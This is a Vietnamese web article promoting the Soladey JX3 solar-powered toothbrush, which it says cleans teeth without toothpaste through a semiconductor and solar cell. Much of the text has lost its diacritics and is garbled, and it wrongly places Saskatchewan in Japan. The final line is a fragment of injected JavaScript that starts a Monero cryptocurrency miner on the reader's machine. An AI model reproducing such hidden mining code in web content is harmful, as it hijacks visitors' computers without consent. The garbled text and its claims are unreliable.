Bàn chải không cần thuốc đánh răng - Nguyễn Trung Quân sưu tầm -

Bàn chải không cần thuốc đánh răng

Bn có tin không? Loi bàn chi không cn thuc đánh răng, s khiến răng bn sáng bóng!
Không cần kem đánh răng, không dùng chỉ nha khoa, và cũng không cần loại hoá chất tẩy rửa nào, nhưng bạn vẫn khiến người khác phải ghen tị vì độ “cười lên đi cho răng vàng chói sáng” của răng mình.
 
Đây là sn phm bàn chi thú v Soladey JX3,  ng dng hin tượng vt lý ca Giáo sư Mitoyama, và Khoa Trưởng Gerry t trường Saskatchowan, Nht Bn.
 
 
 
 
Sn phm mi xut hin nên ch có 4 màu: da cam, tím, hng, và xanh dương đ la chn.
 
Vy chiếc bàn chi này hot đng ra sao đ giúp răng bn trng bóng nh?
 
Trước hết đó là nh 3 phn quan trng: thanh bán dn, v kim loi, và tm pin mt tri.
 
Khi s dng bàn chi dưới ánh sáng mt tri,  hoc bóng đèn, các ht mang đin (electron) được sinh ra t tm pin, và bán dn theo dây dn ti các lông bàn chi. Điu này tương t như các máy tính s dng pin mt tri mà các bn hc sinh vn dùng.
 
Tiếp đó, bàn chi đã làm ướt s giúp các ht mang đin tiếp xúc vi ming, và c hàm răng ca chúng ta (vì nước máy là môi trường dn đin). Đin áp rt nh, nên người dùng khi lo b đin git (b git đin ming thì rt là khng khiếp!).
 
 
Cơ chế hot đng đây này!
 
Khi tiếp xúc vi răng, các ht mang đin s đánh bt các ion hydro (là cu ni vng chc gia các mng bám vi răng). Khi cu ni không còn, chi răng mt cách thông thường (không cn kem) s d dàng làm các mng bám “cng đu” trôi đi. Bàn chi này cũng tiêu dit 2 loi vi khun chính gây bnh nha chu. Răng ca bn s trng bóng, và li răng được bo v.
 
 
“Tôi có th làm mi th nếu có ánh sáng”.
 
Hin ti, chiếc bàn chi này đã được phát min phí cho 120 người dân Nht Bn s dng, ri đưa ra nhn đnh cá nhân. Trong tương lai, nó s khiến các hãng bàn chi bình thường, và hãng kem HYNOS Cha Cha Cha Anh Bày Chà da đen  phi đau đu đây!
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();